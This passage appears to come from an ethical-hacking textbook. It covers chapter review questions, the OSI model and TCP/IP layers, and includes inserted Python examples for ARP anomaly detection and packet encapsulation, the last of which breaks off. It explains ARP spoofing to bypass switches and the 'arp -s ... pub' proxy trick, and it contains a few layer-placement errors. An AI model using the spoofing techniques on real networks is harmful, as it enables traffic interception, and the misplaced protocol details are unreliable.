This chapter addressed ethical hacking and its value to the security professional. Ethical hackers are individuals who possess skills comparable to regular hackers, but ethical hackers engage in their activities only with permission. Ethical hackers attempt to use the same skills, mindset, and motivation as a hacker in order to simulate an attack by an actual hacker while at the same time allowing for the test to be more closely controlled and monitored. Ethical hackers are professionals who work within the confines of a set of rules of engagement that are never exceeded lest they find themselves facing potential legal action. Conversely, regular hackers may not follow the same ethics and limitations as ethical hackers. Regular hackers may work without ethical limitations, and the results they can achieve are restricted only by the means, motives, and opportunities that are made available. Finally, hacking that is not performed under contract is considered illegal and is treated as such. By its very nature, hacking activity can easily cross state and national borders into multiple legal jurisdictions.
## KEY CONCEPTS AND TERMS

Asset, Authentication, Black-box testing, Cracker, Denial of service (DoS), Distributed denial of service (DDoS), Dumpster diving, Ethical hacker, Exploit, Hacker, Trojan horse, Vulnerability, White-box testing

## CHAPTER 1 ASSESSMENT

1. Which of the following represents a valid ethical hacking test methodology?
A. HIPAA
B. RFC 1087
C. OSSTMM
D. TCSEC

2. It is most important to obtain ________ before beginning a penetration test.

3. A security exposure in an operating system or application software component is called a ________.

4. The second step of the hacking process is ________.

5. When hackers talk about standards of behavior and moral issues of right and wrong, what are they referring to?
A. Rules
B. Standards
C. Laws
D. Ethics

6. Hackers may justify their actions based on which of the following?
A. All information should be free
B. Access to computers and their data should be unlimited
C. Writing viruses, malware, or other code is not a crime
D. Any of the above

7. The individual responsible for releasing what is considered to be the first Internet worm was:
A. Kevin Mitnick
B. Robert Morris, Jr.
C. Adrian Lamo
D. Kevin Poulsen

8. A hacker with the computer skills and expertise to launch harmful attacks on computer networks, and who uses those skills illegally, is best described as a(n):
A. Disgruntled employee
B. Ethical hacker
C. White hat hacker
D. Black hat hacker

9. If a penetration test team does not have anything more than a list of IP addresses of the organization's network, what type of test are the penetration testers conducting?
A. Blind assessment
B. White box
C. Gray box
D. Black box

10. How is the practice of tricking employees into revealing sensitive data about their computer system or infrastructure best described?
A. Ethical hacking
B. Dictionary attack
C. Trojan horse
D. Social engineering

# CHAPTER 2 TCP/IP Review

YOU MUST POSSESS a number of skills to conduct a successful and complete penetration test.
Among the skills that are critical is an understanding of Transmission Control Protocol/Internet Protocol (TCP/IP) and its components. Because the Internet and most major networks employ the IP protocol, an understanding of the suite becomes necessary. The IP protocol has become the most widely deployed and utilized networking protocol because of the power and flexibility it offers. The IP protocol has been used in larger deployments and more diverse environments than were ever envisioned by the protocol designers. Although the IP protocol is flexible and scalable, it was not designed to be secure.

Prior to any discussion of TCP/IP, it is important to understand a model that is commonly known as Open Systems Interconnection (OSI). The OSI reference model was originally conceived as a mechanism for facilitating consistent communication and interoperability between networked systems.

This chapter takes a look at the fundamental concepts, technologies, and other items related to networking. Included in this chapter is a closer examination of the TCP/IP networking protocol and its components. This look at the TCP/IP protocol helps you perform tests later on and provides a valuable foundation for understanding various security vulnerabilities and attacks.
## Chapter 2 Topics

This chapter covers the following topics and concepts:
• What the OSI reference model is
• What the TCP/IP layers are

## Chapter 2 Goals

When you complete this chapter, you will be able to:
• Summarize the OSI reference model and TCP/IP model
• Describe the OSI reference model
• Describe the TCP/IP layers
• List the primary protocols of TCP/IP, including IP, Internet Control Message Protocol (ICMP), TCP, and User Datagram Protocol (UDP)
• Select programs found at the application layer of the TCP/IP model
• Describe TCP functions and the importance of flags as related to activities such as scanning
• List reasons why UDP is harder to scan for than TCP
• Identify how ICMP is used and define common ICMP types and codes
• Review the role of IP and its role in networking
• Describe physical frame types
• Detail the components of Ethernet
• List the purpose and structure of Media Access Control (MAC) addresses
• State the operation of carrier sense multiple access/collision detection (CSMA/CD)
• Compare and contrast routable and routing protocols
• Describe link state routing protocols and their vulnerabilities
• Describe distance routing protocols and their vulnerabilities
• Describe the function of protocol analyzers (sniffers)
• Explain the components of a sniffer application
• List common TCP/IP attacks
• Define denial of service (DoS)
• List common distributed denial of service (DDoS) attacks
• Define a SYN flood
• Explain the function of a botnet

## Exploring the OSI Reference Model

This section explores the Open Systems Interconnection (OSI) reference model. In the late 1970s the Open Systems Interconnection Committee was created with the goal of creating a new communication standard for networking. Based on a number of proposals, the OSI reference model was developed and is still used today.
The OSI reference model is used mainly in today's networking environment as both a reference model and an effective means of teaching distributed communication. OSI functions in a predictable and structured fashion designed to ensure compatibility and reliability. If you examine the OSI reference model, you quickly notice that it is made up of seven complementary but distinctly different layers, each tasked with carrying out a discrete group of operations. From the top down, these seven layers are the application, presentation, session, transport, network, data link, and physical layers. These layers are also referred to by number (seven is the application layer, and one is the physical layer). The OSI reference model is also implemented in two areas: hardware and software. The bottom two layers are implemented in hardware, and the top five are implemented through software. The layers of the OSI reference model are shown in Figure 2-1.

FIGURE 2-1 OSI reference model layers: Application, Presentation, Session, Transport, Network, Data Link (with the Logical Link Control (LLC) and Media Access Control (MAC) sublayers), Physical.

The OSI reference model is not a law or rule; it is a recommendation that manufacturers of hardware and software can choose to adhere to or not. Although there is no penalty for not following OSI, vendors risk introducing compatibility problems if their product deviates too far from the model.

## The Role of Protocols

In the world of networking, the term "protocol" is sometimes misused. Protocols are a set of agreed-upon rules through which communication takes place. Protocols can be thought of in the same way as rules for communicating in a given language — certain words and phrases are understood to convey meaning, such as "hello" and "goodbye." Through the use of protocols, dissimilar systems can communicate quickly, easily, and efficiently without any confusion. Ensuring that a standard is in place and every system
or service uses it makes for almost guaranteed interoperability. For example, think of the problems that would arise if the electrical outlets that home appliances are plugged into were all different shapes and sizes. You could never be sure whether the product would work.

Rules are established in the OSI reference model through specific orders and hierarchies, best represented by the use of layers. Each of the seven layers performs a given purpose by receiving data from the layer above or below it and then sending the results on to the next appropriate layer after processing takes place. These seven layers can also be thought of as individual modules, with manufacturers of hardware or software writing their respective products with a specific layer or purpose in mind. Such modularity allows for much easier design and management of networking technologies for all parties involved.

NOTE: When you look at the interaction between layers in the OSI reference model, note that moving from Layer 1 to Layer 7 shows more "intelligence." As you get closer to Layer 7 and move further away from Layer 1, the network components have more "understanding" of the information being handled.

### Layer 1: Physical Layer

At the bottom of the hierarchy of layers in the OSI reference model is the physical layer, also known as Layer 1. This lowest layer defines the electrical and mechanical requirements used to transmit information to and from systems across a given transmission medium (such as cable, fiber, or radio waves). The physical layer deals only with electrical and mechanical characteristics. Examining the physical layer will reveal "how much" and "how long" information is sent, but will not reveal any understanding of the information being transmitted.
Physical layer characteristics include the following:
• Voltage levels
• Data rates
• Maximum transmission distances
• Timing of voltage changes
• Physical connectors and adaptors
• Topology or physical layout of the network

The physical layer also dictates how the information is to be sent. For example, it specifies digital or analog signaling methods, baseband or broadband, and synchronous or asynchronous transmission.

Consider for a moment the types of attacks that could occur at the physical layer, particularly that of an individual getting direct access to transmission media. At the physical layer, the potential for an attack exists in many forms, including someone gaining direct access to physical media, connectivity hardware, computers, or other hardware. Additionally, an attacker accessing the physical layer can place devices on the network that can then be used to capture and/or analyze network traffic. A security engineer should remember these issues and take steps to secure physical devices and network media and, if possible, encrypt network traffic as needed to prevent unauthorized disclosure.

The media access control (MAC) address is also sometimes known as the physical address of a system. This address is provided by hardware, typically in the network card itself, and it is embedded into the hardware at the time of manufacture. In most cases, this address will be unique, but as with most things in security, this isn't guaranteed in all cases (as will be investigated later on). A MAC address is a 6-byte (48-bit) address used to uniquely identify each device on the local network.

### Layer 2: Data Link Layer

One step above the physical layer is Layer 2, also known as the data link layer. As the information moves up from the physical layer to the data link layer, the ability to handle physical addresses, framing, and error handling and messaging is added.
The data link layer adds the ability to provide the initial framing, formatting, and general organization of data prior to handing it off to the physical layer for transmission. More important, the data link layer includes two items that will be important later on: logical link control (LLC) and media access control (MAC).

To understand the actions and activities that occur at the data link layer, one of the structures that must be understood is a frame. A frame can be visualized as a container that the data to be transmitted can be placed into for delivery. Through the use of framing, which is set by the network itself, a standard format for sending and receiving data is established, allowing for mutual understanding of the data being handled. The sending station packages the information into frames, and the receiving station unpacks the information from the frames and moves it along to the next layer for further processing. The frame is a vital structure because it dictates just how a network works at a fundamental level. There are many types of frames that can be discussed, but the most common type of network, and the frames that come with it, is Ethernet. Ethernet, also known as Institute of Electrical and Electronics Engineers (IEEE) 802.3, is used by the majority of data networks.

Another important function of the data link layer is flow control, which is the mechanism that performs data management. Flow control is responsible for ensuring that what is being sent does not overwhelm or exceed the capabilities of a given physical connection. If flow control did not exist, it might be possible under the right conditions to overwhelm a connection with enough traffic to cause an attack similar to a denial of service (DoS) attack.

NOTE: Frame types are specific to a network and cannot be understood by a different network type because the frames would be incompatible.
Although Ethernet is the most common type of network, other common networks include Token Ring (IEEE 802.5) and wireless (IEEE 802.11), each with its own unique and incompatible frame type.

The data link layer has a mechanism known as the Address Resolution Protocol (ARP), which is responsible for translating IP addresses to a previously unknown MAC address. Security is not something that the IP protocol does well, and ARP is a great example: the protocol does not include any ability to authenticate the systems that use it.

### Layer 3: Network Layer

Layer 3 (the network layer) is the entity that handles the logical addressing and routing of traffic. One of the most visible items that appear at this layer is the well-known IP address present in the IP protocol. IP addresses represent what is known as logical addresses, which are nonpersistent addresses assigned via software that are changed as needed or dictated by the network. Logical addresses are used to route traffic as well as assist in the division of a network into logical segments. To get an idea of what a logical network looks like, take a moment to review a network subdivided by different IP subnets, as shown in Figure 2-2. At the network layer, security needs to be considered because manipulation of information can occur at this level.

NOTE: The network layer is the first of the layers within OSI that are implemented in software. Starting at Layer 3 and moving up to Layer 7, each layer is implemented within the software being used, specifically the operating system.

### Layer 4: Transport Layer

Just above the network layer is the transport layer (Layer 4). The transport layer provides a valuable service in network communication: the ability to ensure that data is sent completely and correctly through the use of error recovery and flow control techniques.
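Because ARP offers no way to authenticate who answers a request, the practical defense at Layer 2 is to watch the bindings it produces. The following is an added example, not code from the chapter: it keeps a table of observed IP-to-MAC bindings and raises an alert when a binding changes or when one MAC starts answering for several addresses. The reply records, addresses, and the allowlist of known multi-address devices are constructed assumptions for the sample network.

```python
from collections import defaultdict

# Constructed sample data: (timestamp, sender IP, sender MAC) as decoded from
# ARP replies (opcode 2) seen by a passive monitor on the segment.
SAMPLE_ARP_REPLIES = [
    ("10:00:00", "192.0.2.1",   "02:00:00:00:aa:01"),  # gateway
    ("10:00:02", "192.0.2.254", "02:00:00:00:aa:01"),  # same router, second address
    ("10:00:05", "192.0.2.10",  "02:00:00:00:aa:10"),  # workstation
    ("10:00:09", "192.0.2.1",   "02:00:00:00:aa:01"),  # repeat, binding unchanged
    ("10:01:00", "192.0.2.1",   "02:00:00:00:ee:ee"),  # gateway address claimed by a new MAC
    ("10:01:01", "192.0.2.10",  "02:00:00:00:ee:ee"),  # same MAC also claims the workstation
]

# Devices that legitimately answer for several addresses (routers, virtual IPs
# such as VRRP/HSRP). Assumed for the sample network; maintain it per site.
KNOWN_MULTI_IP = frozenset({"02:00:00:00:aa:01"})


def detect_arp_anomalies(replies, allowlist=KNOWN_MULTI_IP):
    """Replay ARP reply records and return (alerts, final_bindings).

    Two checks are applied to every reply:
      binding-change: an IP that was mapped to one MAC is now claimed by another.
      multi-ip:       one MAC claims a second (third, ...) IP address.
    A binding change is also what a NIC swap or DHCP reassignment looks like,
    so treat alerts as triggers for investigation, not proof of an attack.
    """
    bindings = {}                  # ip  -> MAC most recently seen claiming it
    ips_by_mac = defaultdict(set)  # mac -> every IP it has claimed so far
    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()
        previous = bindings.get(ip)
        if previous is not None and previous != mac:
            alerts.append({"type": "binding-change", "time": ts, "ip": ip,
                           "old_mac": previous, "new_mac": mac})
        bindings[ip] = mac
        if ip not in ips_by_mac[mac]:       # alert once per newly claimed address
            ips_by_mac[mac].add(ip)
            if len(ips_by_mac[mac]) > 1 and mac not in allowlist:
                alerts.append({"type": "multi-ip", "time": ts, "mac": mac,
                               "ips": sorted(ips_by_mac[mac])})
    return alerts, bindings


def format_alert(alert):
    """Render one alert as a single log line."""
    if alert["type"] == "binding-change":
        return "%s binding change: %s moved from %s to %s" % (
            alert["time"], alert["ip"], alert["old_mac"], alert["new_mac"])
    return "%s one MAC (%s) answers for several addresses: %s" % (
        alert["time"], alert["mac"], ", ".join(alert["ips"]))


if __name__ == "__main__":
    found, table = detect_arp_anomalies(SAMPLE_ARP_REPLIES)
    for alert in found:
        print(format_alert(alert))
```

On the sample data the monitor reports the gateway binding change and then flags the new MAC for answering on behalf of two addresses, while the router's second address is suppressed by the allowlist.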
On the surface, the transport layer and its function might seem similar to the data link layer because it also ensures reliability of communication. However, the transport layer not only guarantees the link between stations; it also guarantees the actual delivery of data.

### Connection Versus Connectionless

At the transport layer are the two protocols known as TCP and UDP; these protocols are known as connection-oriented and connectionless, respectively. Connection-oriented protocols operate by acknowledging or confirming every connection request or transmission, much like getting a return receipt for a letter. Connectionless protocols are those that do not require an acknowledgement and in fact do not ask for nor get one. The difference between these two is the overhead that is involved. Due to a connection-oriented protocol's need for acknowledgements, the overhead is higher and the performance is lower, while a connectionless protocol is faster because it has no such requirement.

From a high-level perspective, the transport layer is responsible for communication between host computers and for verifying that both the sender and receiver are ready to initiate the data transfer. The two most widely known protocols found at the transport layer are Transmission Control Protocol (TCP) and User Datagram Protocol (UDP). TCP is connection-oriented, whereas UDP is connectionless. TCP provides reliable communication through the use of handshaking, acknowledgments, error detection, and session teardown. UDP is a connectionless protocol that offers speed and low overhead as its primary advantage.

### Layer 5: Session Layer

Above the transport layer is the session layer (Layer 5), which is responsible for the creation, termination, and management of a given connection. When a connection is required between two points using the TCP protocol, the session layer takes the responsibility for making sure that creation and destruction of the connection occur properly.
Session layer protocols include items such as Remote Procedure Calls (RPCs) and Structured Query Language (SQL).

### Layer 6: Presentation Layer

At the presentation layer (Layer 6), data is put into a format that programs residing at the application layer can understand. Prior to arriving at Layer 6, information is not in a format that application layer programs will be able to process fully and therefore must be put into a format that can be understood. Specific examples of services that are present at the presentation layer include gateway services. Gateway services allow for sending or transmission of data between different points that possess different characteristics that would otherwise make them incompatible. The session layer also manages data compression so that the actual number of bits that must be transmitted on the network can be reduced. Other vital services at the presentation layer are encryption and decryption services. From a security perspective, encryption is important because it provides the ability to keep information confidential.

NOTE: Examples of these formats include American Standard Code for Information Interchange (ASCII) and Extended Binary Coded Decimal Interchange Code (EBCDIC).

NOTE: Be sure that when thinking of the name "application layer," you take care not to think of software applications. Software applications are those items that a user of a system interacts with directly, such as e-mail applications and Web browsers. The application layer is the point at which software applications access network services as needed. Think of the software applications as a microwave oven in your home and the application layer as the electrical outlet that the microwave plugs into to get power.
### Layer 7: Application Layer

Capping off the OSI reference model is the application layer (Layer 7). The application layer hosts several application services that are used by applications and other services running on the system. For example, Web browsers, which would be classified as user-level applications, run on a system and access the network by "plugging" into the services at this layer to use the network. This layer includes network monitoring, management, file sharing, RPC, and other services used by applications. The application layer is one that most users are familiar with because it is the home of e-mail programs, File Transfer Protocol (FTP), Telnet, Web browsers, office productivity suites, and many other applications. It is also the home of many malicious programs such as viruses, worms, Trojan horse programs, and other malevolent applications.

## The Role of Encapsulation

In the OSI framework, the concept of encapsulation is the process of "packaging" information prior to transmitting it from one location to another. When transmitted across the network, it moves down from the application layer to the physical layer and then through the physical medium. As the data moves from the application layer down, the information is packaged and manipulated along the way until it becomes a collection of bits that race down the wire to the receiving station, where the process is reversed as the data moves back up the model.

FIGURE Encapsulation: at the application layer the unit is Data; the transport layer prepends a UDP Header to form UDP Data; the internet layer prepends an IP Header to form IP Data; the link layer wraps the result in a Frame Header and Frame Footer to form Frame Data.
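The encapsulation figure in working code, as an added example that is not part of the chapter: it builds a UDP datagram, wraps it in an IPv4 header and then an Ethernet frame, and reverses the process on the receiving side, checking the frame footer and the IP header checksum before trusting each layer's payload. The MAC addresses, IP addresses, ports, and payload are constructed sample values.

```python
# Added example: walks application data down the stack (UDP, IPv4, Ethernet)
# and back up again. Addresses, ports and payload are constructed sample values.
import socket
import struct
import zlib

ETHERTYPE_IPV4 = 0x0800
IPPROTO_UDP = 17


def ones_complement_checksum(data: bytes) -> int:
    """RFC 1071 checksum as used by the IPv4 header."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:  # fold the carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_udp(payload: bytes, src_port: int, dst_port: int) -> bytes:
    """Transport layer: 8-byte UDP header in front of the application data.
    A zero checksum means 'not computed', which IPv4 permits for UDP."""
    return struct.pack("!HHHH", src_port, dst_port, 8 + len(payload), 0) + payload


def build_ipv4(segment: bytes, src_ip: str, dst_ip: str, ttl: int = 64) -> bytes:
    """Internet layer: 20-byte IPv4 header (no options) with its checksum filled in."""
    header = struct.pack(
        "!BBHHHBBH4s4s",
        (4 << 4) | 5,       # version 4, IHL = 5 words
        0,                  # DSCP/ECN
        20 + len(segment),  # total length
        0x1234,             # identification (constructed)
        0,                  # flags and fragment offset
        ttl,
        IPPROTO_UDP,
        0,                  # checksum placeholder
        socket.inet_aton(src_ip),
        socket.inet_aton(dst_ip),
    )
    checksum = ones_complement_checksum(header)
    return header[:10] + struct.pack("!H", checksum) + header[12:] + segment


def build_ethernet(packet: bytes, src_mac: bytes, dst_mac: bytes) -> bytes:
    """Link layer: 14-byte frame header plus the 4-byte frame footer (FCS).
    A real NIC computes and strips the FCS; modelled here as a CRC-32."""
    body = struct.pack("!6s6sH", dst_mac, src_mac, ETHERTYPE_IPV4) + packet
    return body + struct.pack("<I", zlib.crc32(body) & 0xFFFFFFFF)


def encapsulate(payload, src_mac, dst_mac, src_ip, dst_ip, src_port, dst_port):
    """Data -> UDP segment -> IP packet -> Ethernet frame."""
    segment = build_udp(payload, src_port, dst_port)
    return build_ethernet(build_ipv4(segment, src_ip, dst_ip), src_mac, dst_mac)


def decapsulate(frame: bytes) -> dict:
    """Reverse the process, verifying each layer's integrity field first."""
    body, fcs = frame[:-4], struct.unpack("<I", frame[-4:])[0]
    if zlib.crc32(body) & 0xFFFFFFFF != fcs:
        raise ValueError("frame footer (FCS) mismatch")
    dst_mac, src_mac, ethertype = struct.unpack("!6s6sH", body[:14])
    if ethertype != ETHERTYPE_IPV4:
        raise ValueError("not an IPv4 frame")
    packet = body[14:]
    ihl = (packet[0] & 0x0F) * 4
    if packet[0] >> 4 != 4 or ihl < 20:
        raise ValueError("bad IPv4 header")
    # A valid header sums to zero once the stored checksum is included.
    if ones_complement_checksum(packet[:ihl]) != 0:
        raise ValueError("IP header checksum mismatch")
    total_len = struct.unpack("!H", packet[2:4])[0]
    if packet[9] != IPPROTO_UDP:
        raise ValueError("not a UDP packet")
    segment = packet[ihl:total_len]
    src_port, dst_port, udp_len, _ = struct.unpack("!HHHH", segment[:8])
    return {"src_mac": src_mac.hex(":"), "dst_mac": dst_mac.hex(":"),
            "src_ip": socket.inet_ntoa(packet[12:16]),
            "dst_ip": socket.inet_ntoa(packet[16:20]), "ttl": packet[8],
            "src_port": src_port, "dst_port": dst_port,
            "payload": segment[8:udp_len]}


def is_intact(frame: bytes) -> bool:
    """True when every layer's integrity check passes."""
    try:
        decapsulate(frame)
        return True
    except ValueError:
        return False


def demo() -> dict:
    """Constructed sample: a 5-byte datagram between two hosts on one segment."""
    frame = encapsulate(b"hello", bytes.fromhex("020000000a01"),
                        bytes.fromhex("020000000a02"), "192.0.2.10",
                        "192.0.2.20", 40000, 53)
    result = {"frame_len": len(frame),                               # 14+20+8+5+4
              "ip_total_len": struct.unpack("!H", frame[16:18])[0],  # 20+8+5
              "udp_len": struct.unpack("!H", frame[38:40])[0]}       # 8+5
    result.update(decapsulate(frame))
    return result
```

Each header carries the length of what it wraps, so the frame length, IP total length, and UDP length shrink by exactly one header as the data moves up the stack, and flipping a single bit anywhere in the frame fails the footer check before any upper layer is parsed.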
FIGURE 2-4 Attack layers and the OSI reference model. Application: application attacks, buffer overflows, exploit code, malicious software (e.g., viruses, worms, and Trojans). Presentation: NetBIOS enumeration, clear text extraction, and protocol attacks. Session: session hijacking, SYN attacks, and password attacks. Transport: port scanning, DoS attacks, service enumeration, and flag manipulation. Network: IP attacks, routing attacks, ARP poisoning, MAC flooding, and ICMP assaults such as Smurf. Data Link: passive and active sniffing, MAC spoofing, and WEP cracking. Physical: hardware hacking, lock picking, physical access attacks, wiretapping, and interception.

## Mapping the OSI to Functions and Protocols

Although this chapter is meant to serve only as a primer or introduction to the OSI reference model and TCP/IP protocol, and the concepts introduced here will be explored in depth later, it still is important to understand some details now. Note that later on in this text several attacks will be discussed. Figure 2-4 will help to provide context for that later discussion.

### OSI Layers and Services

Although TCP/IP is the dominant networking model, the OSI reference model remains important. It has served as an invaluable tool or reference model that can be used to map the location of various services. Table 2-1 illustrates each layer of the OSI reference model and some of the various services found at each layer. The OSI reference model protocols at the application layer handle file transfer, virtual terminals, and network management, and fulfill networking requests of applications. A few of the protocols are shown in Table 2-1.

TABLE 2-1 OSI layers and common protocols.

| OSI reference model layer | Common protocols and applications |
|---|---|
| Application | FTP, TFTP, SNMP, Telnet, HTTP, DNS, and POP3 |
| Presentation | ASCII, EBCDIC, TIFF, JPEG, MPEG, and MIDI |
| Session | NetBIOS, SQL, RPC, and NFS |
| Transport | TCP, UDP, SSL, and SPX |
| Network | IP, ICMP, IGMP, BGP, OSPF, and IPX |
| Data Link | ARP, RARP, PPP, SLIP, TLS, L2TP, and PPTP |
| Physical | HSSI, X.21, and EIA/TIA-232 |

TCP/IP is not a new protocol; in fact, the protocol has its genesis back in the early 1970s with the Defense Advanced Research Projects Agency (DARPA).
TCP/IP was designed to be part of a network structure that would be flexible and resilient enough to lower the risk of failure. The protocol has proven to be a very flexible and well-designed protocol. Although version 4 (IPv4) is by far the most used version, use of IPv6 is starting to increase. However, for all the advantages that the IP protocol has, one thing it does not do well is security. The original architects of the protocol never foresaw the security issues that are present today.

# TCP/IP (a Layer-by-Layer Review)

Having explored the OSI reference model and looked at examples of each layer, let's turn our attention to TCP/IP. It is important to envision TCP/IP as a suite of protocols that controls the way information travels from location to location, and to realize early on that TCP/IP is a collection of protocols that perform a wide array of functions. This is the reason why TCP/IP is known more accurately as the TCP/IP protocol suite. When individuals refer to the TCP/IP protocol they are generally referring to the IP portion of the suite, which is the one responsible for addressing and routing information. Out of the fairly large suite of TCP/IP protocols there are four that generally serve as the foundation of the suite: IP, TCP, UDP, and ICMP. These protocols are so vital to normal network functioning that no device will exist on a TCP/IP network without supporting all of them. Each of the four main protocols provides some vital service or purpose that will be explored later in this text. It is possible to tie in at least a few of the items that have been mentioned so far (such as encapsulation) because each of these protocols in some way prepares the data to be moved on the network as it leaves Layer 7 and moves down. An example of the TCP/IP stack can be seen in Figure 2-5.
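The encapsulation described under "The Role of Encapsulation", carried down the TCP/IP stack just discussed, as an added example that is not part of the original text: application data is wrapped in a UDP header, then an IPv4 header (with a correct header checksum), then an Ethernet II header, and each layer's PDU is returned so the growth at every step is visible. The IP and MAC addresses and the DNS port are taken from the Figure 2-7 capture on this page; the payload is a constructed sample and the IP identification value is arbitrary.

```python
"""Encapsulation walk-through: wrap application data in UDP, IP, and Ethernet
headers the way the stack does as data moves from Layer 7 toward the wire.

Added example, not from the original text. The payload is a constructed
sample; addresses mirror the capture in Figure 2-7."""
import struct


def ip_checksum(data: bytes) -> int:
    """Internet checksum: one's complement of the one's-complement sum of
    all 16-bit words (zero-padded if the length is odd)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def ip_to_bytes(ip: str) -> bytes:
    return bytes(int(o) for o in ip.split("."))


def mac_to_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def udp_segment(src_port: int, dst_port: int, payload: bytes) -> bytes:
    """Transport layer: 8-byte UDP header in front of the application data.
    The UDP checksum is left at zero, which IPv4 permits (it is optional)."""
    length = 8 + len(payload)
    return struct.pack("!HHHH", src_port, dst_port, length, 0) + payload


def ip_packet(src_ip: str, dst_ip: str, segment: bytes, ttl: int = 64) -> bytes:
    """Internet layer: 20-byte IPv4 header without options. Protocol 17 = UDP.
    The checksum is computed over the header with the checksum field zeroed."""
    ver_ihl = (4 << 4) | 5                      # version 4, 5 x 32-bit words
    total_len = 20 + len(segment)
    header_wo_sum = struct.pack("!BBHHHBBH4s4s", ver_ihl, 0, total_len,
                                0x1234,          # identification (arbitrary)
                                0, ttl, 17, 0,
                                ip_to_bytes(src_ip), ip_to_bytes(dst_ip))
    csum = ip_checksum(header_wo_sum)
    header = header_wo_sum[:10] + struct.pack("!H", csum) + header_wo_sum[12:]
    return header + segment


def ethernet_frame(src_mac: str, dst_mac: str, packet: bytes) -> bytes:
    """Link layer: 14-byte Ethernet II header, EtherType 0x0800 = IPv4.
    The 4-byte FCS trailer is normally appended by the NIC and is omitted."""
    return (mac_to_bytes(dst_mac) + mac_to_bytes(src_mac)
            + struct.pack("!H", 0x0800) + packet)


def encapsulate(payload: bytes) -> dict:
    """Run the payload down the stack; return every layer's PDU."""
    seg = udp_segment(56956, 53, payload)
    pkt = ip_packet("192.168.123.114", "192.168.123.254", seg)
    frm = ethernet_frame("00:1a:70:11:c4:3c", "00:1c:10:f5:61:9c", pkt)
    return {"application": payload, "transport": seg, "internet": pkt, "link": frm}


if __name__ == "__main__":
    for name, pdu in encapsulate(b"constructed application data").items():
        print("%-12s %3d bytes" % (name, len(pdu)))
```

The receiving side reverses the process: it strips the 14-byte Ethernet header, verifies that the IP header checksum computes to zero, and hands the UDP data to the application. The checksum is also what a router checks before forwarding, which is why a corrupted header is dropped at Layer 3 rather than reaching the application.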
[FIGURE 2-5 A comparison of TCP/IP and the OSI reference model. OSI reference model: 7 Application, 6 Presentation, 5 Session, 4 Transport, 3 Network, 2 Data Link, 1 Physical. TCP/IP model: Application at the top through Physical at the bottom.]

Although TCP/IP has proven to be a flexible and robust network protocol, it was impossible for the designers of the protocol to anticipate every eventuality that could arise. A more trusting environment existed when TCP/IP was designed. As such, the protocol lacks significant security capabilities. In fact, several components of TCP/IP are insecure. Although IPv6 is quickly emerging as the replacement for IPv4 and will include security measures designed to address the problems, it is far from being in widespread usage. Pay special attention to the security concerns associated with each layer and its specific protocols. The four layers of TCP/IP include the following:

• Application layer
• Host-to-host layer
• Internet layer
• Network access layer

# Physical/Network Access Layer

The physical/network access layer, which resides at the lowest layer of the TCP/IP model, is the point at which the higher-layer protocols interface with the network transport media. When compared to the OSI reference model, this layer corresponds to OSI Layers 1 and 2.

# Physical/Network Equipment

Physical/network equipment located at this layer of the TCP/IP model usually includes the following devices:

• Repeaters — A device that amplifies, reshapes, or regenerates signals during retransmission. Typically these devices are used when long distances need to be covered and the distance exceeds the supported length of the medium.
• Hubs — A hub receives a signal on one port and retransmits it to every other port on the hub. It does not alter the transmission in any way. Although common in networks that were smaller in nature, hubs are not nearly as common today. Hubs possess several ports.
• Bridges — Whereas hubs receive a signal on one port and retransmit it to every other port indiscriminately, a bridge does not do so. Bridges direct information based on MAC addresses and as such can control the flow of traffic much better than hubs can. These devices only send information to ports that actually are the intended recipients of the information. They initially saw increased popularity due to their ability to overcome problems associated with hubs.
• Switches — Devices that add additional intelligence to what already exists in bridges by providing the following:
  • Extremely low latency
  • Operation in half-duplex or full-duplex modes
  • Forwarding decisions based on the destination MAC address
  • A separate collision domain on each port

Although low-end consumer switches have limited functionality, more expensive switches that are found in large networks provide greater functionality. These higher-end switches typically provide the following:

• A command line interface via Telnet or console port to configure remotely
• A browser-based interface for configuration

All switches work in similar ways, with vendors adding value-added features to make their product easier than, or different from, a competitor's. Even with this functionality, all devices connected to a switch are thought to be part of the same broadcast domain; that is, each port on a switch is a separate collision domain. A broadcast frame sent by any particular device on a switch is automatically forwarded to all other devices connected to the switch.

# Physical/Network Layer Protocols

Protocols found at this layer include ARP, Reverse Address Resolution Protocol (RARP), Transport Layer Security (TLS), Layer 2 Tunneling Protocol (L2TP), LTTP, Point-to-Point Protocol (PPP), and Serial Line Interface Protocol (SLIP). One of the most important services is ARP.
ARP's role is to provide the ability to resolve IP addresses to an unknown MAC address. ARP works by using a two-step process to perform resolution. First, it uses a broadcast requesting a physical address from a target. Each device processes the request, and if the station with the address requested is reached, it responds with its physical or MAC address. Requests that are returned are cached on the local system for later reference if needed. The ARP cache on a system can be viewed at any time by using the arp -a command at the command line. An example of this command is shown here:

C:\>arp -a

Interface: 192.168.123.114 --- 0x4
  Internet Address      Physical Address        Type
  192.168.123.121       [illegible]-12-26-bf    dynamic
  192.168.123.130       00-23-4d-70-af-20       dynamic
  192.168.123.254       00-1c-10-f5-61-9c       dynamic

NOTE: You can permanently maintain, or statically add, an ARP entry by using the arp -s <ip address> <MAC address> command. By permanently adding an entry, future requests will be faster because the broadcast process does not have to occur; the mapping is already cached. Add the string "pub" to the end of the command, and the system will act as an ARP server, answering ARP requests even for an IP that it does not possess.

You can use ARP to bypass the features in a switch. For example, an attacker can provide falsified ARP responses that are accepted as valid. The switch then "thinks" that the attacker is really the other system, and redirects traffic to that address.

NOTE: Although many types of frames can be presented and handled at this layer of the TCP/IP model, Ethernet is by far the most common. Ethernet frames have several characteristics; one is using a MAC address for addressing at this level.

Also included at this layer are legacy protocols known as Serial Line Interface Protocol (SLIP) and Point-to-Point Protocol (PPP).
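Going back to the arp -a listing above, the falsified ARP responses the text describes leave a footprint in exactly that cache: one MAC address answering for more than one IP, or the gateway's MAC changing from what it was last week. The following added example (not from the original text) parses the Windows arp -a layout and runs those two checks. The sample output and the "known good" gateway baseline are constructed values; the baseline MAC reuses the gateway entry shown above.

```python
"""Detect signs of ARP poisoning from the output of `arp -a`.

Added example, not from the original text. SAMPLE_ARP_OUTPUT is constructed
in the layout of the Windows `arp -a` listing; the MAC addresses and the
KNOWN_GOOD baseline are sample values."""
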